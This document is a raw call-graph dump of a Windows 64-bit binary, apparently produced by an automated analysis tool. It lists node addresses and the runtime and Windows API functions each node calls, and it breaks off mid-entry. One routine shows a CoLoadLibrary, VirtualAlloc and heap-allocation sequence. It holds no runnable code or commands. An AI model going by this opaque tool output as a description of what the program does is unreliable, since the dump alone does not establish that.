7fef9d30e68 17499->17500 17503 7fef9d30e39 DecodePointer DecodePointer 17499->17503 17505 7fef9d30eed DecodePointer 17500->17505 17506 7fef9d30f0d 17500->17506 17512 7fef9d30ec8 17500->17512 17502 7fef9d30d6a 7 API calls 17501->17502 17501->17511 17502->17499 17507 7fef9d30df3 GetProcAddress EncodePointer 17502->17507 17503->17500 17504 7fef9d30f60 DecodePointer 17504->17511 17505->17506 17506->17504 17510 7fef9d30f2f DecodePointer 17506->17510 17507->17499 17508 7fef9d23280 __GSHandlerCheck 8 API calls 17509 7fef9d2b358 17508->17509 17509->17489 17509->17490 17510->17504 17510->17512 17511->17508 17512->17504 17513->17497 17514 7fef9d234d5 17515 7fef9d234da _calloc_dbg 17514->17515 17516 7fef9d2350b FlsSetValue 17515->17516 17520 7fef9d23548 17515->17520 17517 7fef9d23520 17516->17517 17516->17520 17518 7fef9d23e30 LeaveCriticalSection 17517->17518 17519 7fef9d2352c GetCurrentThreadId 17518->17519 17519->17520 18529 7fef9d25ad9 18530 7fef9d25add 18529->18530 18531 7fef9d26380 _CrtIsValidHeapPointer HeapValidate 18530->18531 18532 7fef9d25b3a 18531->18532 18535 7fef9d29360 LeaveCriticalSection 18532->18535 18534 7fef9d25c14 18535->18534 18008 7fef9d233d6 18011 7fef9d288d0 HeapDestroy 18008->18011 18010 7fef9d233db 18011->18010 18547 7fef9d266da 18548 7fef9d26725 18547->18548 18550 7fef9d26745 18547->18550 18548->18550 18553 7fef9d29a70 18548->18553 18551 7fef9d2677f 18550->18551 18552 7fef9d29b10 __updatetmbcinfo LeaveCriticalSection 18550->18552 18552->18551 18554 7fef9d29a79 _updatetlocinfoEx_nolock 18553->18554 18556 7fef9d29ad8 18554->18556 18557 7fef9d29360 LeaveCriticalSection 18554->18557 18556->18550 18557->18556 17521 7fef9d268c4 17522 7fef9d268d1 17521->17522 17523 7fef9d26ba6 17522->17523 17525 7fef9d268ed _CrtIsValidPointer 17522->17525 17539 7fef9d29360 LeaveCriticalSection 17523->17539 17527 7fef9d2695e IsBadReadPtr 17525->17527 17528 7fef9d26976 17525->17528 17537 7fef9d2692f 17525->17537 17526 7fef9d26bb0 17527->17528 17529 7fef9d26ad2 17528->17529 17530 7fef9d26a29 17528->17530 17533 7fef9d26b2d 17529->17533 17534 7fef9d26add 17529->17534 17531 7fef9d26abe 17530->17531 17532 7fef9d26a86 IsBadReadPtr 17530->17532 17536 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17531->17536 17532->17531 17532->17537 17533->17537 17538 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17533->17538 17535 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17534->17535 17535->17537 17536->17537 17538->17537 17539->17526 18558 7fef9d376c0 18559 7fef9d376cf _CrtMemDumpAllObjectsSince 18558->18559 18560 7fef9d37be3 _CrtMemDumpAllObjectsSince 18558->18560 18562 7fef9d37905 _CrtMemDumpAllObjectsSince 18559->18562 18563 7fef9d377f5 _CrtMemDumpAllObjectsSince wcsncnt 18559->18563 18571 7fef9d376e6 _LocaleUpdate::~_LocaleUpdate 18559->18571 18561 7fef9d37cc6 WideCharToMultiByte 18560->18561 18560->18571 18561->18571 18565 7fef9d3790f WideCharToMultiByte 18562->18565 18568 7fef9d37827 WideCharToMultiByte 18563->18568 18564 7fef9d23280 __GSHandlerCheck 8 API calls 18566 7fef9d37d85 18564->18566 18567 7fef9d37965 18565->18567 18569 7fef9d3799a GetLastError 18567->18569 18567->18571 18568->18571 18569->18571 18572 7fef9d379d3 _CrtMemDumpAllObjectsSince 18569->18572 18570 7fef9d37a05 WideCharToMultiByte 18570->18571 18570->18572 18571->18564 18572->18570 18572->18571 18024 7fef9d2f7f1 18025 7fef9d2f80d 18024->18025 18044 7fef9d2f8de _wcsftime_l 18024->18044 18081 7fef9d36fb0 18025->18081 18028 7fef9d2fa70 18088 7fef9d369c0 18028->18088 18029 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18032 7fef9d2f85a OutputDebugStringA 18029->18032 18031 7fef9d2f9f4 18031->18028 18034 7fef9d2d490 std::exception::_Copy_str 17 API calls 18031->18034 18035 7fef9d2f872 OutputDebugStringA OutputDebugStringA OutputDebugStringA OutputDebugStringA 18032->18035 18033 7fef9d2fa8a 18036 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18033->18036 18037 7fef9d2fa43 18034->18037 18041 7fef9d2f8ce 18035->18041 18039 7fef9d2fab7 18036->18039 18040 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18037->18040 18042 7fef9d2fb24 18039->18042 18045 7fef9d369c0 17 API calls 18039->18045 18057 7fef9d2fb6a 18039->18057 18040->18028 18049 7fef9d23280 __GSHandlerCheck 8 API calls 18041->18049 18043 7fef9d369c0 17 API calls 18042->18043 18046 7fef9d2fb3d 18043->18046 18044->18031 18050 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18044->18050 18051 7fef9d2f996 18044->18051 18047 7fef9d2faf7 18045->18047 18048 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18046->18048 18052 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18047->18052 18048->18057 18053 7fef9d3011d 18049->18053 18050->18051 18051->18031 18054 7fef9d2d490 std::exception::_Copy_str 17 API calls 18051->18054 18052->18042 18055 7fef9d2f9c7 18054->18055 18056 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18055->18056 18056->18031 18058 7fef9d2fc39 18057->18058 18060 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18057->18060 18059 7fef9d2fc97 18058->18059 18061 7fef9d2d490 std::exception::_Copy_str 17 API calls 18058->18061 18101 7fef9d36970 18059->18101 18060->18058 18062 7fef9d2fc6a 18061->18062 18064 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18062->18064 18064->18059 18066 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18067 7fef9d2fd6e 18066->18067 18068 7fef9d31640 17 API calls 18067->18068 18076 7fef9d2fdbb 18067->18076 18069 7fef9d2fd8e 18068->18069 18070 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18069->18070 18070->18076 18071 7fef9d2ffef 18073 7fef9d30008 OutputDebugStringA 18071->18073 18074 7fef9d30016 18071->18074 18072 7fef9d2ff03 std::exception::_Copy_str 18072->18041 18072->18071 18077 7fef9d2ffaa WriteFile 18072->18077 18073->18074 18074->18041 18078 7fef9d36fb0 _itow_s 17 API calls 18074->18078 18076->18072 18104 7fef9d29360 LeaveCriticalSection 18076->18104 18077->18071 18079 7fef9d30065 18078->18079 18080 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18079->18080 18080->18041 18082 7fef9d37003 18081->18082 18083 7fef9d36fd6 18081->18083 18084 7fef9d37030 _itow_s 17 API calls 18082->18084 18083->18082 18085 7fef9d36fdd 18083->18085 18087 7fef9d2f82d 18084->18087 18105 7fef9d37030 18085->18105 18087->18029 18089 7fef9d369e1 18088->18089 18090 7fef9d36a42 18089->18090 18092 7fef9d36a80 _calloc_dbg_impl 18089->18092 18091 7fef9d2bd70 _invalid_parameter 17 API calls 18090->18091 18097 7fef9d36a76 _calloc_dbg_impl 18091->18097 18093 7fef9d36b6e 18092->18093 18094 7fef9d36bac _calloc_dbg_impl 18092->18094 18095 7fef9d2bd70 _invalid_parameter 17 API calls 18093->18095 18096 7fef9d36ce8 18094->18096 18099 7fef9d36d26 _calloc_dbg_impl 18094->18099 18095->18097 18098 7fef9d2bd70 _invalid_parameter 17 API calls 18096->18098 18097->18033 18098->18097 18099->18097 18100 7fef9d2bd70 _invalid_parameter 17 API calls 18099->18100 18100->18097 18121 7fef9d363e0 18101->18121 18103 7fef9d2fd20 18103->18066 18104->18072 18106 7fef9d37055 18105->18106 18107 7fef9d370ab 18106->18107 18109 7fef9d370e9 18106->18109 18108 7fef9d2bd70 _invalid_parameter 17 API calls 18107->18108 18118 7fef9d370df 18108->18118 18110 7fef9d3714a 18109->18110 18112 7fef9d37188 _calloc_dbg_impl 18109->18112 18111 7fef9d2bd70 _invalid_parameter 17 API calls 18110->18111 18111->18118 18113 7fef9d37287 18112->18113 18116 7fef9d372c5 18112->18116 18114 7fef9d2bd70 _invalid_parameter 17 API calls 18113->18114 18114->18118 18115 7fef9d37338 18117 7fef9d2bd70 _invalid_parameter 17 API calls 18115->18117 18116->18115 18119 7fef9d37376 18116->18119 18117->18118 18118->18087 18119->18118 18120 7fef9d2bd70 _invalid_parameter 17 API calls 18119->18120 18120->18118 18122 7fef9d3640e 18121->18122 18123 7fef9d3648e 18122->18123 18125 7fef9d364cc _calloc_dbg_impl 18122->18125 18124 7fef9d2bd70 _invalid_parameter 17 API calls 18123->18124 18131 7fef9d364c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 18124->18131 18126 7fef9d3668e _CrtMemDumpAllObjectsSince 18125->18126 18127 7fef9d3663f 18125->18127 18133 7fef9d35ea0 18126->18133 18128 7fef9d2bd70 _invalid_parameter 17 API calls 18127->18128 18128->18131 18130 7fef9d366b5 _calloc_dbg_impl 18130->18131 18132 7fef9d2bd70 _invalid_parameter 17 API calls 18130->18132 18131->18103 18132->18131 18134 7fef9d35ecf 18133->18134 18135 7fef9d35fae 18134->18135 18136 7fef9d35f6e 18134->18136 18143 7fef9d35eda std::exception::_Copy_str _LocaleUpdate::~_LocaleUpdate 18134->18143 18138 7fef9d35fcf _CrtMemDumpAllObjectsSince 18135->18138 18139 7fef9d362e1 _CrtMemDumpAllObjectsSince 18135->18139 18137 7fef9d2bd70 _invalid_parameter 17 API calls 18136->18137 18137->18143 18141 7fef9d360a1 MultiByteToWideChar 18138->18141 18138->18143 18140 7fef9d3632f MultiByteToWideChar 18139->18140 18139->18143 18140->18143 18142 7fef9d3610e GetLastError 18141->18142 18141->18143 18142->18143 18144 7fef9d36154 _CrtMemDumpAllObjectsSince wcsxfrm 18142->18144 18143->18130 18144->18143 18145 7fef9d36238 MultiByteToWideChar 18144->18145 18145->18143 16439 7fef9d26ff2 16440 7fef9d26ffe 16439->16440 16443 7fef9d2ca00 16440->16443 16442 7fef9d27011 _initterm_e 16444 7fef9d2ca0e 16443->16444 16445 7fef9d2ca23 EncodePointer 16444->16445 16446 7fef9d2ca4b 16444->16446 16445->16444 16446->16442 18615 7fef9d3e2fc 18616 7fef9d3e309 get_int64_arg _get_printf_count_output 18615->18616 18617 7fef9d3e38c 18616->18617 18618 7fef9d3e3e1 18616->18618 18622 7fef9d2bd70 _invalid_parameter 17 API calls 18617->18622 18619 7fef9d3eadf 18618->18619 18620 7fef9d3eec0 25 API calls 18618->18620 18629 7fef9d3da75 18618->18629 18621 7fef9d3ef10 25 API calls 18619->18621 18620->18619 18624 7fef9d3eafd 18621->18624 18638 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18622->18638 18623 7fef9d3eb33 18625 7fef9d3ec29 18623->18625 18639 7fef9d3eb49 _CrtMemDumpAllObjectsSince 18623->18639 18624->18623 18628 7fef9d3eec0 25 API calls 18624->18628 18626 7fef9d3ebda 18625->18626 18627 7fef9d3ef10 25 API calls 18625->18627 18626->18629 18634 7fef9d3eec0 25 API calls 18626->18634 18627->18626 18628->18623 18631 7fef9d3eca1 18629->18631 18635 7fef9d3dbb5 18629->18635 18630 7fef9d23280 __GSHandlerCheck 8 API calls 18632 7fef9d3ed9e 18630->18632 18633 7fef9d2bd70 _invalid_parameter 17 API calls 18631->18633 18631->18638 18633->18638 18634->18629 18637 7fef9d2bd70 _invalid_parameter 17 API calls 18635->18637 18636 7fef9d3f000 wcsxfrm 2 API calls 18636->18639 18637->18638 18638->18630 18639->18626 18639->18636 18640 7fef9d3ee40 25 API calls 18639->18640 18640->18639 18146 7fef9d253fb 18147 7fef9d2541d _realloc_dbg 18146->18147 18149 7fef9d25421 18147->18149 18152 7fef9d26380 18147->18152 18150 7fef9d254de _calloc_dbg_impl _realloc_dbg 18151 7fef9d2c020 _free_base 2 API calls 18150->18151 18151->18149 18153 7fef9d26391 18152->18153 18154 7fef9d26395 _CrtIsValidPointer 18152->18154 18153->18150 18154->18153 18155 7fef9d263b6 HeapValidate 18154->18155 18155->18153 16472 7fef9d235e1 16473 7fef9d235ea 16472->16473 16474 7fef9d235f1 16472->16474 16474->16473 16478 7fef9d212b0 16474->16478 16477 7fef9d212b0 14 API calls 16477->16473 16479 7fef9d212de CoLoadLibrary 16478->16479 16484 7fef9d22f8c 16478->16484 16481 7fef9d22f0f MessageBoxA ExitProcess 16479->16481 16482 7fef9d22f2e VirtualAlloc RtlAllocateHeap 16479->16482 16480 7fef9d23280 __GSHandlerCheck 8 API calls 16485 7fef9d230ff 16480->16485 16483 7fef9d22f73 _calloc_dbg_impl 16482->16483 16482->16484 16486 7fef9d22f83 CoTaskMemFree 16483->16486 16484->16480 16485->16473 16485->16477 16486->16484 18156 7fef9d23fe1 18157 7fef9d23fea SetLastError 18156->18157 16487 7fef9d27de0 16488 7fef9d27ded 16487->16488 16492 7fef9d27df2 std::exception::_Copy_str _calloc_dbg 16487->16492 16494 7fef9d2aa40 16488->16494 16490 7fef9d27e0e 16492->16490 16498 7fef9d2d490 16492->16498 16508 7fef9d27ff0 16492->16508 16495 7fef9d2aa57 16494->16495 16496 7fef9d2aa4d 16494->16496 16495->16492 16512 7fef9d29c10 16496->16512 16500 7fef9d2d4b1 16498->16500 16499 7fef9d2d512 16501 7fef9d2bd70 _invalid_parameter 17 API calls 16499->16501 16500->16499 16502 7fef9d2d550 _calloc_dbg_impl 16500->16502 16504 7fef9d2d546 _calloc_dbg_impl 16501->16504 16503 7fef9d2d63e 16502->16503 16506 7fef9d2d67c _calloc_dbg_impl 16502->16506 16505 7fef9d2bd70 _invalid_parameter 17 API calls 16503->16505 16504->16492 16505->16504 16506->16504 16507 7fef9d2bd70 _invalid_parameter 17 API calls 16506->16507 16507->16504 16509 7fef9d28010 16508->16509 16510 7fef9d2800e 16508->16510 16511 7fef9d2be00 _invoke_watson_if_oneof 16 API calls 16509->16511 16510->16492 16511->16510 16513 7fef9d29c2a 16512->16513 16522 7fef9d29b10 16513->16522 16515 7fef9d29c34 16526 7fef9d29f20 16515->16526 16517 7fef9d29c51 16519 7fef9d29ecd 16517->16519 16532 7fef9d2a000 16517->16532 16519->16495 16520 7fef9d29ce8 16520->16519 16545 7fef9d29360 LeaveCriticalSection 16520->16545 16525 7fef9d29b19 16522->16525 16524 7fef9d29bde 16524->16515 16525->16524 16546 7fef9d29360 LeaveCriticalSection 16525->16546 16527 7fef9d29f49 16526->16527 16528 7fef9d29f81 16527->16528 16529 7fef9d29f5b GetOEMCP 16527->16529 16530 7fef9d29f88 GetACP 16528->16530 16531 7fef9d29f79 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16528->16531 16529->16531 16530->16531 16531->16517 16533 7fef9d29f20 __initmbctable 2 API calls 16532->16533 16535 7fef9d2a028 16533->16535 16534 7fef9d2a039 __initmbctable 16538 7fef9d23280 __GSHandlerCheck 8 API calls 16534->16538 16535->16534 16536 7fef9d2a234 16535->16536 16537 7fef9d2a08e __initmbctable 16535->16537 16536->16534 16540 7fef9d2a25d IsValidCodePage 16536->16540 16547 7fef9d2a5e0 GetCPInfo 16537->16547 16539 7fef9d2a470 16538->16539 16539->16520 16540->16534 16541 7fef9d2a27b GetCPInfo 16540->16541 16541->16534 16544 7fef9d2a295 __initmbctable 16541->16544 16543 7fef9d2a5e0 __initmbctable 19 API calls 16543->16534 16544->16543 16545->16519 16546->16524 16548 7fef9d2a61f 16547->16548 16556 7fef9d2a7dc 16547->16556 16551 7fef9d2f4d0 _CrtMemDumpAllObjectsSince_stat 3 API calls 16548->16551 16549 7fef9d23280 __GSHandlerCheck 8 API calls 16550 7fef9d2aa30 16549->16550 16550->16534 16552 7fef9d2a734 16551->16552 16558 7fef9d2ef00 16552->16558 16554 7fef9d2a788 16555 7fef9d2ef00 __initmbctable 7 API calls 16554->16555 16555->16556 16556->16549 16557 7fef9d2a80a 16556->16557 16557->16534 16559 7fef9d2ef2c _CrtMemDumpAllObjectsSince 16558->16559 16562 7fef9d2efb0 16559->16562 16561 7fef9d2ef8e _LocaleUpdate::~_LocaleUpdate 16561->16554 16563 7fef9d2efd4 __initmbctable 16562->16563 16564 7fef9d2f068 MultiByteToWideChar 16563->16564 16567 7fef9d2f0ac malloc _MarkAllocaS 16564->16567 16570 7fef9d2f0a5 _CrtMemDumpAllObjectsSince_stat 16564->16570 16565 7fef9d2f122 MultiByteToWideChar 16566 7fef9d2f164 LCMapStringW 16565->16566 16565->16570 16568 7fef9d2f1a8 16566->16568 16566->16570 16567->16565 16567->16570 16569 7fef9d2f1b8 16568->16569 16576 7fef9d2f222 malloc _MarkAllocaS 16568->16576 16569->16570 16571 7fef9d2f1d9 LCMapStringW 16569->16571 16570->16561 16571->16570 16572 7fef9d2f2ac LCMapStringW 16572->16570 16573 7fef9d2f2ea 16572->16573 16574 7fef9d2f341 WideCharToMultiByte 16573->16574 16575 7fef9d2f2f4 WideCharToMultiByte 16573->16575 16574->16570 16575->16570 16576->16570 16576->16572 18652 7fef9d312e3 LoadLibraryW 18653 7fef9d31304 GetProcAddress 18652->18653 18661 7fef9d312fd 18652->18661 18654 7fef9d3132a 7 API calls 18653->18654 18653->18661 18655 7fef9d313b3 GetProcAddress EncodePointer 18654->18655 18656 7fef9d313d5 18654->18656 18655->18656 18659 7fef9d313f9 DecodePointer DecodePointer 18656->18659 18662 7fef9d31428 DecodePointer 18656->18662 18657 7fef9d23280 __GSHandlerCheck 8 API calls 18658 7fef9d3157a 18657->18658 18659->18662 18661->18657 18662->18661 17557 7fef9d344e5 17558 7fef9d3445a __SehTransFilter 17557->17558 17559 7fef9d3466c __SehTransFilter 17558->17559 17569 7fef9d35180 17558->17569 17560 7fef9d347d7 17559->17560 17576 7fef9d35bb0 17559->17576 17561 7fef9d3485b 17560->17561 17562 7fef9d2cf80 _inconsistency 36 API calls 17560->17562 17562->17561 17565 7fef9d34727 17565->17560 17566 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17565->17566 17567 7fef9d34767 17566->17567 17582 7fef9d2edc0 RtlUnwindEx 17567->17582 17570 7fef9d2e500 __GetUnwindTryBlock 37 API calls 17569->17570 17571 7fef9d351c1 17570->17571 17572 7fef9d351f0 __SehTransFilter 17571->17572 17585 7fef9d35970 17571->17585 17574 7fef9d2edc0 __SehTransFilter 9 API calls 17572->17574 17575 7fef9d35259 17574->17575 17575->17558 17577 7fef9d35bc6 17576->17577 17578 7fef9d35bc8 17576->17578 17580 7fef9d2cf50 terminate 35 API calls 17577->17580 17581 7fef9d35bda __SehTransFilter 17577->17581 17579 7fef9d2cf80 _inconsistency 36 API calls 17578->17579 17579->17577 17580->17581 17581->17565 17583 7fef9d23280 __GSHandlerCheck 8 API calls 17582->17583 17584 7fef9d2eee7 17583->17584 17584->17560 17586 7fef9d35998 17585->17586 17589 7fef9d355f0 17586->17589 17588 7fef9d359d3 __SehTransFilter __AdjustPointer 17588->17572 17590 7fef9d3561e __SehTransFilter 17589->17590 17591 7fef9d35765 17590->17591 17592 7fef9d356fa _ValidateRead 17590->17592 17600 7fef9d356aa __SehTransFilter __AdjustPointer 17590->17600 17593 7fef9d3577a _ValidateRead 17591->17593 17594 7fef9d35813 __SehTransFilter 17591->17594 17595 7fef9d2cf80 _inconsistency 36 API calls 17592->17595 17592->17600 17596 7fef9d2cf80 _inconsistency 36 API calls 17593->17596 17593->17600 17597 7fef9d3584d _ValidateRead 17594->17597 17601 7fef9d358c6 __SehTransFilter _ValidateExecute _ValidateRead 17594->17601 17595->17600 17596->17600 17598 7fef9d2cf80 _inconsistency 36 API calls 17597->17598 17597->17600 17598->17600 17599 7fef9d2cf80 _inconsistency 36 API calls 17599->17600 17600->17588 17601->17599 17601->17600 18158 7fef9d3bfde 18168 7fef9d3c00c 18158->18168 18159 7fef9d3b99c 18160 7fef9d3cc93 18159->18160 18165 7fef9d3bada 18159->18165 18161 7fef9d2bd70 _invalid_parameter 17 API calls 18160->18161 18163 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18160->18163 18161->18163 18162 7fef9d3b530 wctomb_s 19 API calls 18162->18168 18164 7fef9d23280 __GSHandlerCheck 8 API calls 18163->18164 18166 7fef9d3cd90 18164->18166 18167 7fef9d2bd70 _invalid_parameter 17 API calls 18165->18167 18167->18163 18168->18159 18168->18162 16994 7fef9d35de0 16999 7fef9d23170 16994->16999 16997 7fef9d35e86 17000 7fef9d231ac 16999->17000 17001 7fef9d23280 __GSHandlerCheck 8 API calls 17000->17001 17002 7fef9d23263 17001->17002 17002->16997 17003 7fef9d23870 17002->17003 17004 7fef9d238de __SehTransFilter 17003->17004 17006 7fef9d239db __SehTransFilter 17003->17006 17005 7fef9d23a71 RtlUnwindEx 17004->17005 17004->17006 17005->17006 17006->16997 17007 7fef9d3ade0 17012 7fef9d3fee0 17007->17012 17010 7fef9d3adf9 17022 7fef9d3ff00 17012->17022 17014 7fef9d3ade9 17014->17010 17015 7fef9d3fc70 17014->17015 17021 7fef9d3fc86 17015->17021 17016 7fef9d3fd59 17093 7fef9d29360 LeaveCriticalSection 17016->17093 17018 7fef9d3fd63 17018->17010 17020 7fef9d3fd09 DeleteCriticalSection 17020->17021 17021->17016 17021->17020 17082 7fef9d40580 17021->17082 17023 7fef9d3ff22 17022->17023 17024 7fef9d40042 17023->17024 17025 7fef9d3ff47 17023->17025 17055 7fef9d29360 LeaveCriticalSection 17024->17055 17026 7fef9d4003d 17025->17026 17037 7fef9d3ae90 17025->17037 17026->17014 17028 7fef9d4004c 17028->17014 17030 7fef9d3ff97 17032 7fef9d3ffe1 17030->17032 17033 7fef9d3ffbb 17030->17033 17036 7fef9d3ffd0 17030->17036 17035 7fef9d3fd70 _fflush_nolock 25 API calls 17032->17035 17032->17036 17040 7fef9d3fd70 17033->17040 17035->17036 17050 7fef9d3af60 17036->17050 17038 7fef9d3aec8 EnterCriticalSection 17037->17038 17039 7fef9d3aea4 17037->17039 17038->17039 17039->17030 17041 7fef9d3fd81 17040->17041 17042 7fef9d3fd8a 17040->17042 17043 7fef9d3ff00 _fflush_nolock 25 API calls 17041->17043 17056 7fef9d3fdf0 17042->17056 17049 7fef9d3fd88 17043->17049 17045 7fef9d3fd94 17045->17049 17060 7fef9d3afb0 17045->17060 17049->17036 17051 7fef9d3af74 17050->17051 17052 7fef9d3af98 LeaveCriticalSection 17050->17052 17081 7fef9d29360 LeaveCriticalSection 17051->17081 17053 7fef9d3af96 17052->17053 17053->17026 17055->17028 17057 7fef9d3fe1f 17056->17057 17059 7fef9d3fe5d 17056->17059 17058 7fef9d3afb0 _fflush_nolock 17 API calls 17057->17058 17057->17059 17058->17059 17059->17045 17062 7fef9d3afc1 17060->17062 17061 7fef9d3b04b 17064 7fef9d407c0 17061->17064 17062->17061 17063 7fef9d2bd70 _invalid_parameter 17 API calls 17062->17063 17063->17061 17065 7fef9d407d3 17064->17065 17066 7fef9d407e8 17064->17066 17065->17049 17067 7fef9d40851 17066->17067 17073 7fef9d4088f 17066->17073 17068 7fef9d2bd70 _invalid_parameter 17 API calls 17067->17068 17068->17065 17069 7fef9d40913 17074 7fef9d2bd70 _invalid_parameter 17 API calls 17069->17074 17070 7fef9d40951 17071 7fef9d3fae0 _fflush_nolock 3 API calls 17070->17071 17072 7fef9d4095a 17071->17072 17075 7fef9d3f900 _fflush_nolock 17 API calls 17072->17075 17079 7fef9d409ab __doserrno 17072->17079 17073->17069 17073->17070 17074->17065 17076 7fef9d40992 FlushFileBuffers 17075->17076 17077 7fef9d4099f GetLastError 17076->17077 17076->17079 17077->17079 17080 7fef9d3fbc0 LeaveCriticalSection 17079->17080 17080->17065 17081->17053 17083 7fef9d40599 17082->17083 17084 7fef9d405ef 17083->17084 17085 7fef9d4062a 17083->17085 17087 7fef9d2bd70 _invalid_parameter 17 API calls 17084->17087 17089 7fef9d40623 17085->17089 17094 7fef9d3ae10 17085->17094 17087->17089 17088 7fef9d40651 17098 7fef9d40680 17088->17098 17089->17021 17091 7fef9d4065c 17109 7fef9d3aee0 17091->17109 17093->17018 17095 7fef9d3ae77 EnterCriticalSection 17094->17095 17096 7fef9d3ae27 17094->17096 17097 7fef9d3ae3b 17095->17097 17096->17095 17096->17097 17097->17088 17099 7fef9d40699 17098->17099 17100 7fef9d406ef 17099->17100 17101 7fef9d4072d 17099->17101 17104 7fef9d2bd70 _invalid_parameter 17 API calls 17100->17104 17102 7fef9d40723 17101->17102 17103 7fef9d3fdf0 _fflush_nolock 17 API calls 17101->17103 17102->17091 17105 7fef9d40752 17103->17105 17104->17102 17106 7fef9d3afb0 _fflush_nolock 17 API calls 17105->17106 17107 7fef9d4076a 17106->17107 17115 7fef9d40a20 17107->17115 17110 7fef9d3af47 LeaveCriticalSection 17109->17110 17111 7fef9d3aef7 17109->17111 17114 7fef9d3af45 17110->17114 17111->17110 17112 7fef9d3af0b 17111->17112 17151 7fef9d29360 LeaveCriticalSection 17112->17151 17114->17089 17116 7fef9d40a53 17115->17116 17122 7fef9d40a33 __doserrno 17115->17122 17117 7fef9d40b05 17116->17117 17118 7fef9d40abc __doserrno 17116->17118 17119 7fef9d40bd2 17117->17119 17124 7fef9d40b89 __doserrno 17117->17124 17121 7fef9d2bd70 _invalid_parameter 17 API calls 17118->17121 17120 7fef9d3fae0 _fflush_nolock 3 API calls 17119->17120 17123 7fef9d40bdb 17120->17123 17121->17122 17122->17102 17127 7fef9d40c13 17123->17127 17129 7fef9d40c80 17123->17129 17126 7fef9d2bd70 _invalid_parameter 17 API calls 17124->17126 17126->17122 17142 7fef9d3fbc0 LeaveCriticalSection 17127->17142 17130 7fef9d3f900 _fflush_nolock 17 API calls 17129->17130 17133 7fef9d40c91 17130->17133 17131 7fef9d40d05 17143 7fef9d3f7d0 17131->17143 17133->17131 17135 7fef9d3f900 _fflush_nolock 17 API calls 17133->17135 17141 7fef9d40ce5 17133->17141 17134 7fef9d3f900 _fflush_nolock 17 API calls 17136 7fef9d40cf8 CloseHandle 17134->17136 17137 7fef9d40cd6 17135->17137 17136->17131 17138 7fef9d40d0f GetLastError 17136->17138 17140 7fef9d3f900 _fflush_nolock 17 API calls 17137->17140 17138->17131 17139 7fef9d40d22 _dosmaperr 17139->17127 17140->17141 17141->17131 17141->17134 17142->17122 17144 7fef9d3f7e3 17143->17144 17150 7fef9d3f878 __doserrno 17143->17150 17145 7fef9d3f87a SetStdHandle 17144->17145 17146 7fef9d3f86a 17144->17146 17144->17150 17145->17150 17147 7fef9d3f871 17146->17147 17148 7fef9d3f889 SetStdHandle 17146->17148 17149 7fef9d3f898 SetStdHandle 17147->17149 17147->17150 17148->17150 17149->17150 17150->17139 17151->17114 17602 7fef9d348e0 17603 7fef9d348f7 std::bad_exception::~bad_exception 17602->17603 17604 7fef9d3490c 17603->17604 17606 7fef9d3d710 17603->17606 17607 7fef9d3d721 17606->17607 17608 7fef9d3d726 17606->17608 17607->17604 17610 7fef9d29360 LeaveCriticalSection 17608->17610 17610->17607 18690 7fef9d27ae3 18693 7fef9d27af3 18690->18693 18691 7fef9d27ce0 SetHandleCount 18699 7fef9d27c74 18691->18699 18692 7fef9d27c7b 18692->18691 18693->18691 18693->18692 18694 7fef9d27b95 GetStdHandle 18693->18694 18694->18692 18695 7fef9d27bb9 18694->18695 18695->18692 18696 7fef9d27bc8 GetFileType 18695->18696 18696->18692 18698 7fef9d27beb InitializeCriticalSectionAndSpinCount 18696->18698 18698->18692 18698->18699 17611 7fef9d314e1 17612 7fef9d314ef DecodePointer 17611->17612 17613 7fef9d31520 DecodePointer 17611->17613 17612->17613 17615 7fef9d3150f 17612->17615 17614 7fef9d31540 17613->17614 17616 7fef9d23280 __GSHandlerCheck 8 API calls 17614->17616 17615->17613 17617 7fef9d3157a 17616->17617 18175 7fef9d2a7e9 18176 7fef9d2a7f9 18175->18176 18177 7fef9d2a80a 18176->18177 18178 7fef9d23280 __GSHandlerCheck 8 API calls 18176->18178 18179 7fef9d2aa30 18178->18179 18180 7fef9d2c7e9 18181 7fef9d2c90c EncodePointer EncodePointer 18180->18181 18184 7fef9d2c80d 18180->18184 18182 7fef9d2c8ca 18181->18182 18183 7fef9d2c872 18183->18182 18186 7fef9d24a00 _realloc_dbg 30 API calls 18183->18186 18188 7fef9d2c8ce EncodePointer 18183->18188 18184->18183 18189 7fef9d24a00 18184->18189 18187 7fef9d2c8bd 18186->18187 18187->18182 18187->18188 18188->18181 18190 7fef9d24a22 18189->18190 18195 7fef9d24a70 18190->18195 18192 7fef9d24a4c 18206 7fef9d29360 LeaveCriticalSection 18192->18206 18194 7fef9d24a5b 18194->18183 18196 7fef9d24aae _calloc_dbg_impl 18195->18196 18197 7fef9d24ad4 _realloc_dbg 18195->18197 18196->18192 18197->18196 18198 7fef9d26380 _CrtIsValidHeapPointer HeapValidate 18197->18198 18202 7fef9d24e2c 18198->18202 18199 7fef9d24f90 18222 7fef9d2ba60 18199->18222 18200 7fef9d24f64 18207 7fef9d2bc30 18200->18207 18202->18196 18202->18199 18202->18200 18204 7fef9d24fa6 18204->18196 18205 7fef9d24fba HeapSize 18204->18205 18205->18196 18206->18194 18208 7fef9d2bc50 18207->18208 18209 7fef9d2bc5f 18207->18209 18233 7fef9d2abf0 18208->18233 18211 7fef9d2bc67 18209->18211 18213 7fef9d2bc78 18209->18213 18212 7fef9d2c020 _free_base 2 API calls 18211->18212 18220 7fef9d2bc5a _get_errno_from_oserr 18212->18220 18214 7fef9d2bcba 18213->18214 18215 7fef9d2bc9a HeapReAlloc 18213->18215 18217 7fef9d2bce4 18213->18217 18219 7fef9d2abb0 _callnewh 